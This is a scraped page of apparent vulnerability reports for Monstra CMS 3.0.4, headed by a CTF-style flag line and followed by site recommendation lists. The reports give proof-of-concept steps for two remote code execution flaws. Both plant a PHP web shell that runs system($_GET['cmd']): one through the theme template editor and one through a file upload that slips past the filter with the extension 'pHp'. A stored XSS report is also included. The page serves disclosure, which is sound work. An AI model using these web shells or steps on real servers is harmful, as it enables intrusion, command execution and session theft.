Flag{gg_monstra_no_cve_T.T}
monstra's Introduction
monstra's People
monstra's Issues
Remote Code Execution via Theme module in Templates function edit in Monstra 3.0.4
Version: 3.0.4
Description
An attacker could insert any executable code through php via Theme module in Templates function edit to execution command in the server.
Proof of Concept
Step 1: Go to "/admin/index.php?id=themes&action=edit_template&filename=blog", click "Edit" and insert payload:
<?php
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
Step 2: Click "Save and Exit", then go to "/blog"
command: whoami
command: dir /b
Stored XSS on "editor" param in Create Page function in monstra 3.0.4
Version: 3.0.4
Description
It is possible to insert javascript in page content created by a user with editor permission.
Proof of Concept
Step 1: Go to "/admin/index.php?id=pages&action=add_page", create new blog with content include javascript code by user editor
Result: Any user accessing the blog page will execute the added javascript code, example I login with user admin
Blog Page:
Impact
Can steal or manipulate client sessions and cookies, can be used to impersonate legitimate users, allow hackers to view or change user profiles, and perform transactions as users there, including administrator
Remote Code Execution Bypass filter via Files module in Monstra 3.0.4
Version: 3.0.4
Description
An attacker could insert any executable code through php via Files Module to execution command in the server.
Proof of Concept
Step 1: Go to "/admin/index.php?id=filesmanager", click "Select File" and upload "exploit.pHp" then click "Upload".
exploit.pHp content:
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>
Upload success
Step 2: Access the file uploaded and RCE
command: whoami
command: dir
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.